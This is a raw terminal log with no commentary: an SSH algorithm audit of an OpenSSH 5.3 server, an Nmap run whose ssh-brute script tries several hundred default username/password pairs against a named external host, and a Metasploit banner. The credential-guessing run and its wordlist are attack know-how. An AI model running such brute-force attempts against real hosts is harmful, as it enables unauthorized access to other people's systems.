- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 2.1.0
- (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- # message authentication code algorithms
- (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.5.0
- (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.1.0
- (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
- (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0
- # algorithm recommendations (for OpenSSH 5.3)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -ssh-dss -- key algorithm to remove
- (rec) -arcfour -- enc algorithm to remove
- (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -arcfour256 -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -arcfour128 -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-md5-96 -- mac algorithm to remove
- (rec) -hmac-ripemd160 -- mac algorithm to remove
- (rec) -hmac-sha1-96 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-md5 -- mac algorithm to remove
- (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 17:27 EDT
- NSE: [ssh-run] Failed to specify credentials and command to run.
- NSE: [ssh-brute] Trying username/password pair: root:root
- NSE: [ssh-brute] Trying username/password pair: admin:admin
- NSE: [ssh-brute] Trying username/password pair: administrator:administrator
- NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
- NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
- NSE: [ssh-brute] Trying username/password pair: guest:guest
- NSE: [ssh-brute] Trying username/password pair: user:user
- NSE: [ssh-brute] Trying username/password pair: web:web
- NSE: [ssh-brute] Trying username/password pair: test:test
- NSE: [ssh-brute] Trying username/password pair: root:
- NSE: [ssh-brute] Trying username/password pair: admin:
- NSE: [ssh-brute] Trying username/password pair: administrator:
- NSE: [ssh-brute] Trying username/password pair: webadmin:
- NSE: [ssh-brute] Trying username/password pair: sysadmin:
- NSE: [ssh-brute] Trying username/password pair: netadmin:
- NSE: [ssh-brute] Trying username/password pair: guest:
- NSE: [ssh-brute] Trying username/password pair: user:
- NSE: [ssh-brute] Trying username/password pair: web:
- NSE: [ssh-brute] Trying username/password pair: test:
- NSE: [ssh-brute] Trying username/password pair: root:123456
- NSE: [ssh-brute] Trying username/password pair: admin:123456
- NSE: [ssh-brute] Trying username/password pair: administrator:123456
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456
- NSE: [ssh-brute] Trying username/password pair: guest:123456
- NSE: [ssh-brute] Trying username/password pair: user:123456
- NSE: [ssh-brute] Trying username/password pair: web:123456
- NSE: [ssh-brute] Trying username/password pair: test:123456
- NSE: [ssh-brute] Trying username/password pair: root:12345
- NSE: [ssh-brute] Trying username/password pair: admin:12345
- NSE: [ssh-brute] Trying username/password pair: administrator:12345
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345
- NSE: [ssh-brute] Trying username/password pair: guest:12345
- NSE: [ssh-brute] Trying username/password pair: user:12345
- NSE: [ssh-brute] Trying username/password pair: web:12345
- NSE: [ssh-brute] Trying username/password pair: test:12345
- NSE: [ssh-brute] Trying username/password pair: root:123456789
- NSE: [ssh-brute] Trying username/password pair: admin:123456789
- NSE: [ssh-brute] Trying username/password pair: administrator:123456789
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: guest:123456789
- NSE: [ssh-brute] Trying username/password pair: user:123456789
- NSE: [ssh-brute] Trying username/password pair: web:123456789
- NSE: [ssh-brute] Trying username/password pair: test:123456789
- NSE: [ssh-brute] Trying username/password pair: root:password
- NSE: [ssh-brute] Trying username/password pair: admin:password
- NSE: [ssh-brute] Trying username/password pair: administrator:password
- NSE: [ssh-brute] Trying username/password pair: webadmin:password
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password
- NSE: [ssh-brute] Trying username/password pair: netadmin:password
- NSE: [ssh-brute] Trying username/password pair: guest:password
- NSE: [ssh-brute] Trying username/password pair: user:password
- NSE: [ssh-brute] Trying username/password pair: web:password
- NSE: [ssh-brute] Trying username/password pair: test:password
- NSE: [ssh-brute] Trying username/password pair: root:iloveyou
- NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
- NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
- NSE: [ssh-brute] Trying username/password pair: user:iloveyou
- NSE: [ssh-brute] Trying username/password pair: web:iloveyou
- NSE: [ssh-brute] Trying username/password pair: test:iloveyou
- NSE: [ssh-brute] Trying username/password pair: root:princess
- NSE: [ssh-brute] Trying username/password pair: admin:princess
- NSE: [ssh-brute] Trying username/password pair: administrator:princess
- NSE: [ssh-brute] Trying username/password pair: webadmin:princess
- NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
- NSE: [ssh-brute] Trying username/password pair: netadmin:princess
- NSE: [ssh-brute] Trying username/password pair: guest:princess
- NSE: [ssh-brute] Trying username/password pair: user:princess
- NSE: [ssh-brute] Trying username/password pair: web:princess
- NSE: [ssh-brute] Trying username/password pair: test:princess
- NSE: [ssh-brute] Trying username/password pair: root:12345678
- NSE: [ssh-brute] Trying username/password pair: admin:12345678
- NSE: [ssh-brute] Trying username/password pair: administrator:12345678
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: guest:12345678
- NSE: [ssh-brute] Trying username/password pair: user:12345678
- NSE: [ssh-brute] Trying username/password pair: web:12345678
- NSE: [ssh-brute] Trying username/password pair: test:12345678
- NSE: [ssh-brute] Trying username/password pair: root:1234567
- NSE: [ssh-brute] Trying username/password pair: admin:1234567
- NSE: [ssh-brute] Trying username/password pair: administrator:1234567
- NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: guest:1234567
- NSE: [ssh-brute] Trying username/password pair: user:1234567
- NSE: [ssh-brute] Trying username/password pair: web:1234567
- NSE: [ssh-brute] Trying username/password pair: test:1234567
- NSE: [ssh-brute] Trying username/password pair: root:abc123
- NSE: [ssh-brute] Trying username/password pair: admin:abc123
- NSE: [ssh-brute] Trying username/password pair: administrator:abc123
- NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: guest:abc123
- NSE: [ssh-brute] Trying username/password pair: user:abc123
- NSE: [ssh-brute] Trying username/password pair: web:abc123
- NSE: [ssh-brute] Trying username/password pair: test:abc123
- NSE: [ssh-brute] Trying username/password pair: root:nicole
- NSE: [ssh-brute] Trying username/password pair: admin:nicole
- NSE: [ssh-brute] Trying username/password pair: administrator:nicole
- NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: guest:nicole
- NSE: [ssh-brute] Trying username/password pair: user:nicole
- NSE: [ssh-brute] Trying username/password pair: web:nicole
- NSE: [ssh-brute] Trying username/password pair: test:nicole
- NSE: [ssh-brute] Trying username/password pair: root:daniel
- NSE: [ssh-brute] Trying username/password pair: admin:daniel
- NSE: [ssh-brute] Trying username/password pair: administrator:daniel
- NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: guest:daniel
- NSE: [ssh-brute] Trying username/password pair: user:daniel
- NSE: [ssh-brute] Trying username/password pair: web:daniel
- NSE: [ssh-brute] Trying username/password pair: test:daniel
- NSE: [ssh-brute] Trying username/password pair: root:monkey
- NSE: [ssh-brute] Trying username/password pair: admin:monkey
- NSE: [ssh-brute] Trying username/password pair: administrator:monkey
- NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: guest:monkey
- NSE: [ssh-brute] Trying username/password pair: user:monkey
- NSE: [ssh-brute] Trying username/password pair: web:monkey
- NSE: [ssh-brute] Trying username/password pair: test:monkey
- NSE: [ssh-brute] Trying username/password pair: root:babygirl
- NSE: [ssh-brute] Trying username/password pair: admin:babygirl
- NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
- NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: guest:babygirl
- NSE: [ssh-brute] Trying username/password pair: user:babygirl
- NSE: [ssh-brute] Trying username/password pair: web:babygirl
- NSE: [ssh-brute] Trying username/password pair: test:babygirl
- NSE: [ssh-brute] Trying username/password pair: root:qwerty
- NSE: [ssh-brute] Trying username/password pair: admin:qwerty
- NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
- NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: guest:qwerty
- NSE: [ssh-brute] Trying username/password pair: user:qwerty
- NSE: [ssh-brute] Trying username/password pair: web:qwerty
- NSE: [ssh-brute] Trying username/password pair: test:qwerty
- NSE: [ssh-brute] Trying username/password pair: root:lovely
- NSE: [ssh-brute] Trying username/password pair: admin:lovely
- NSE: [ssh-brute] Trying username/password pair: administrator:lovely
- NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: guest:lovely
- NSE: [ssh-brute] Trying username/password pair: user:lovely
- NSE: [ssh-brute] Trying username/password pair: web:lovely
- NSE: [ssh-brute] Trying username/password pair: test:lovely
- NSE: [ssh-brute] Trying username/password pair: root:654321
- NSE: [ssh-brute] Trying username/password pair: admin:654321
- NSE: [ssh-brute] Trying username/password pair: administrator:654321
- NSE: [ssh-brute] Trying username/password pair: webadmin:654321
- NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
- NSE: [ssh-brute] Trying username/password pair: netadmin:654321
- NSE: [ssh-brute] Trying username/password pair: guest:654321
- NSE: [ssh-brute] Trying username/password pair: user:654321
- NSE: [ssh-brute] Trying username/password pair: web:654321
- NSE: [ssh-brute] Trying username/password pair: test:654321
- NSE: [ssh-brute] Trying username/password pair: root:michael
- NSE: [ssh-brute] Trying username/password pair: admin:michael
- NSE: [ssh-brute] Trying username/password pair: administrator:michael
- NSE: [ssh-brute] Trying username/password pair: webadmin:michael
- NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
- NSE: [ssh-brute] Trying username/password pair: netadmin:michael
- NSE: [ssh-brute] Trying username/password pair: guest:michael
- NSE: [ssh-brute] Trying username/password pair: user:michael
- NSE: [ssh-brute] Trying username/password pair: web:michael
- NSE: [ssh-brute] Trying username/password pair: test:michael
- NSE: [ssh-brute] Trying username/password pair: root:jessica
- NSE: [ssh-brute] Trying username/password pair: admin:jessica
- NSE: [ssh-brute] Trying username/password pair: administrator:jessica
- NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: guest:jessica
- NSE: [ssh-brute] Trying username/password pair: user:jessica
- NSE: [ssh-brute] Trying username/password pair: web:jessica
- NSE: [ssh-brute] Trying username/password pair: test:jessica
- NSE: [ssh-brute] Trying username/password pair: root:111111
- NSE: [ssh-brute] Trying username/password pair: admin:111111
- NSE: [ssh-brute] Trying username/password pair: administrator:111111
- NSE: [ssh-brute] Trying username/password pair: webadmin:111111
- NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
- NSE: [ssh-brute] Trying username/password pair: netadmin:111111
- NSE: [ssh-brute] Trying username/password pair: guest:111111
- NSE: [ssh-brute] Trying username/password pair: user:111111
- NSE: [ssh-brute] Trying username/password pair: web:111111
- NSE: [ssh-brute] Trying username/password pair: test:111111
- NSE: [ssh-brute] Trying username/password pair: root:ashley
- NSE: [ssh-brute] Trying username/password pair: admin:ashley
- NSE: [ssh-brute] Trying username/password pair: administrator:ashley
- NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: guest:ashley
- NSE: [ssh-brute] Trying username/password pair: user:ashley
- NSE: [ssh-brute] Trying username/password pair: web:ashley
- NSE: [ssh-brute] Trying username/password pair: test:ashley
- NSE: [ssh-brute] Trying username/password pair: root:000000
- NSE: [ssh-brute] Trying username/password pair: admin:000000
- NSE: [ssh-brute] Trying username/password pair: administrator:000000
- NSE: [ssh-brute] Trying username/password pair: webadmin:000000
- NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
- NSE: [ssh-brute] Trying username/password pair: netadmin:000000
- NSE: [ssh-brute] Trying username/password pair: guest:000000
- NSE: [ssh-brute] Trying username/password pair: user:000000
- NSE: [ssh-brute] Trying username/password pair: web:000000
- NSE: [ssh-brute] Trying username/password pair: test:000000
- NSE: [ssh-brute] Trying username/password pair: root:iloveu
- NSE: [ssh-brute] Trying username/password pair: admin:iloveu
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
- NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: guest:iloveu
- NSE: [ssh-brute] Trying username/password pair: user:iloveu
- NSE: [ssh-brute] Trying username/password pair: web:iloveu
- NSE: [ssh-brute] Trying username/password pair: test:iloveu
- NSE: [ssh-brute] Trying username/password pair: root:michelle
- NSE: [ssh-brute] Trying username/password pair: admin:michelle
- NSE: [ssh-brute] Trying username/password pair: administrator:michelle
- NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: guest:michelle
- NSE: [ssh-brute] Trying username/password pair: user:michelle
- NSE: [ssh-brute] Trying username/password pair: web:michelle
- NSE: [ssh-brute] Trying username/password pair: test:michelle
- NSE: [ssh-brute] Trying username/password pair: root:tigger
- NSE: [ssh-brute] Trying username/password pair: admin:tigger
- NSE: [ssh-brute] Trying username/password pair: administrator:tigger
- NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: guest:tigger
- NSE: [ssh-brute] Trying username/password pair: user:tigger
- NSE: [ssh-brute] Trying username/password pair: web:tigger
- NSE: [ssh-brute] Trying username/password pair: test:tigger
- NSE: [ssh-brute] Trying username/password pair: root:sunshine
- NSE: [ssh-brute] Trying username/password pair: admin:sunshine
- NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
- NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: guest:sunshine
- NSE: [ssh-brute] Trying username/password pair: user:sunshine
- NSE: [ssh-brute] Trying username/password pair: web:sunshine
- NSE: [ssh-brute] Trying username/password pair: test:sunshine
- NSE: [ssh-brute] Trying username/password pair: root:chocolate
- NSE: [ssh-brute] Trying username/password pair: admin:chocolate
- NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
- NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: guest:chocolate
- NSE: [ssh-brute] Trying username/password pair: user:chocolate
- NSE: [ssh-brute] Trying username/password pair: web:chocolate
- NSE: [ssh-brute] Trying username/password pair: test:chocolate
- NSE: [ssh-brute] Trying username/password pair: root:password1
- NSE: [ssh-brute] Trying username/password pair: admin:password1
- NSE: [ssh-brute] Trying username/password pair: administrator:password1
- NSE: [ssh-brute] Trying username/password pair: webadmin:password1
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
- NSE: [ssh-brute] Trying username/password pair: netadmin:password1
- NSE: [ssh-brute] Trying username/password pair: guest:password1
- NSE: [ssh-brute] Trying username/password pair: user:password1
- NSE: [ssh-brute] Trying username/password pair: web:password1
- NSE: [ssh-brute] Trying username/password pair: test:password1
- NSE: [ssh-brute] Trying username/password pair: root:soccer
- NSE: [ssh-brute] Trying username/password pair: admin:soccer
- NSE: [ssh-brute] Trying username/password pair: administrator:soccer
- NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: guest:soccer
- NSE: [ssh-brute] Trying username/password pair: user:soccer
- NSE: [ssh-brute] Trying username/password pair: web:soccer
- NSE: [ssh-brute] Trying username/password pair: test:soccer
- NSE: [ssh-brute] Trying username/password pair: root:anthony
- NSE: [ssh-brute] Trying username/password pair: admin:anthony
- NSE: [ssh-brute] Trying username/password pair: administrator:anthony
- NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: guest:anthony
- NSE: [ssh-brute] Trying username/password pair: user:anthony
- NSE: [ssh-brute] Trying username/password pair: web:anthony
- NSE: [ssh-brute] Trying username/password pair: test:anthony
- NSE: [ssh-brute] Trying username/password pair: root:friends
- NSE: [ssh-brute] Trying username/password pair: admin:friends
- NSE: [ssh-brute] Trying username/password pair: administrator:friends
- NSE: [ssh-brute] Trying username/password pair: webadmin:friends
- NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
- NSE: [ssh-brute] Trying username/password pair: netadmin:friends
- NSE: [ssh-brute] Trying username/password pair: guest:friends
- NSE: [ssh-brute] Trying username/password pair: user:friends
- NSE: [ssh-brute] Trying username/password pair: web:friends
- NSE: [ssh-brute] Trying username/password pair: test:friends
- NSE: [ssh-brute] Trying username/password pair: root:purple
- NSE: [ssh-brute] Trying username/password pair: admin:purple
- NSE: [ssh-brute] Trying username/password pair: administrator:purple
- NSE: [ssh-brute] Trying username/password pair: webadmin:purple
- NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
- NSE: [ssh-brute] Trying username/password pair: netadmin:purple
- NSE: [ssh-brute] Trying username/password pair: guest:purple
- NSE: [ssh-brute] Trying username/password pair: user:purple
- NSE: [ssh-brute] Trying username/password pair: web:purple
- NSE: [ssh-brute] Trying username/password pair: test:purple
- NSE: [ssh-brute] Trying username/password pair: root:angel
- NSE: [ssh-brute] Trying username/password pair: admin:angel
- NSE: [ssh-brute] Trying username/password pair: administrator:angel
- NSE: [ssh-brute] Trying username/password pair: webadmin:angel
- NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
- NSE: [ssh-brute] Trying username/password pair: netadmin:angel
- NSE: [ssh-brute] Trying username/password pair: guest:angel
- NSE: [ssh-brute] Trying username/password pair: user:angel
- NSE: [ssh-brute] Trying username/password pair: web:angel
- NSE: [ssh-brute] Trying username/password pair: test:angel
- NSE: [ssh-brute] Trying username/password pair: root:butterfly
- NSE: [ssh-brute] Trying username/password pair: admin:butterfly
- NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
- NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: guest:butterfly
- NSE: [ssh-brute] Trying username/password pair: user:butterfly
- NSE: [ssh-brute] Trying username/password pair: web:butterfly
- NSE: [ssh-brute] Trying username/password pair: test:butterfly
- NSE: [ssh-brute] Trying username/password pair: root:jordan
- NSE: [ssh-brute] Trying username/password pair: admin:jordan
- NSE: [ssh-brute] Trying username/password pair: administrator:jordan
- NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: guest:jordan
- NSE: [ssh-brute] Trying username/password pair: user:jordan
- NSE: [ssh-brute] Trying username/password pair: web:jordan
- NSE: [ssh-brute] Trying username/password pair: test:jordan
- NSE: [ssh-brute] Trying username/password pair: root:fuckyou
- NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
- NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
- NSE: [ssh-brute] Trying username/password pair: user:fuckyou
- NSE: [ssh-brute] Trying username/password pair: web:fuckyou
- NSE: [ssh-brute] Trying username/password pair: test:fuckyou
- NSE: [ssh-brute] Trying username/password pair: root:123123
- NSE: [ssh-brute] Trying username/password pair: admin:123123
- NSE: [ssh-brute] Trying username/password pair: administrator:123123
- NSE: [ssh-brute] Trying username/password pair: webadmin:123123
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
- NSE: [ssh-brute] Trying username/password pair: netadmin:123123
- NSE: [ssh-brute] Trying username/password pair: guest:123123
- NSE: [ssh-brute] Trying username/password pair: user:123123
- NSE: [ssh-brute] Trying username/password pair: web:123123
- NSE: [ssh-brute] Trying username/password pair: test:123123
- NSE: [ssh-brute] Trying username/password pair: root:justin
- NSE: [ssh-brute] Trying username/password pair: admin:justin
- Nmap scan report for euro.fashionmod.biz (80.82.69.63)
- Host is up (0.13s latency).
- rDNS record for 80.82.69.63: jademonitor.net
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- | ssh-auth-methods:
- | Supported authentication methods:
- | publickey
- | gssapi-keyex
- | gssapi-with-mic
- |_ password
- | ssh-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 382 guesses in 182 seconds, average tps: 2.2
- | ssh-hostkey:
- | 1024 8e:e7:56:ea:03:ad:32:fe:55:c7:ac:da:71:96:9b:f9 (DSA)
- |_ 2048 a7:8a:8f:c3:77:e7:10:4e:72:be:41:a8:9a:70:41:d7 (RSA)
- |_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
- |_ssh-run: Failed to specify credentials and command to run.
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 2.6.39 (97%), Linux 2.6.32 (94%), Linux 3.4 (94%), Linux 2.6.18 - 2.6.22 (94%), Synology DiskStation Manager 5.1 (94%), Linux 3.10 (93%), Linux 3.1 - 3.2 (93%), Linux 2.6.32 or 3.10 (93%), WatchGuard Fireware 11.8 (93%), Linux 2.6.32 - 2.6.39 (92%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 10 hops
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 111.61 ms 10.13.0.1
- 2 ...
- 3 111.64 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
- 4 112.60 ms 10.95.33.8
- 5 119.89 ms be100-1109.fra-1-a9.de.eu (213.186.32.213)
- 6 ...
- 7 135.13 ms vlan3555.bb1.ams2.nl.m247.com (176.10.83.128)
- 8 121.94 ms 176.10.83.119
- 9 ...
- 10 122.00 ms jademonitor.net (80.82.69.63)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 200.46 seconds
- Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
- EFLAGS: 00010046
- eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
- esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
- ds: 0018 es: 0018 ss: 0018
- Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
- Stack: 90909090990909090990909090
- 90909090990909090990909090
- 90909090.90909090.90909090
- 90909090.90909090.90909090
- 90909090.90909090.09090900
- 90909090.90909090.09090900
- ..........................
- cccccccccccccccccccccccccc
- cccccccccccccccccccccccccc
- ccccccccc.................
- cccccccccccccccccccccccccc
- cccccccccccccccccccccccccc
- .................ccccccccc
- cccccccccccccccccccccccccc
- cccccccccccccccccccccccccc
- ..........................
- ffffffffffffffffffffffffff
- ffffffff..................
- ffffffffffffffffffffffffff
- ffffffff..................
- ffffffff..................
- ffffffff..................
- Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
- Aiee, Killing Interrupt handler
- Kernel panic: Attempted to kill the idle task!
- In swapper task - not syncing
- =[ metasploit v4.16.8-dev ]
- + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]
- + -- --=[ 498 payloads - 40 encoders - 10 nops ]
